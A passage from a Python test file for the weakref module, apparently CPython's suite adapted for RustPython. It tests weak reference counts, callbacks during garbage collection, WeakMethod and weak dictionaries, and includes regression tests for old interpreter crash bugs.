"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlaying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
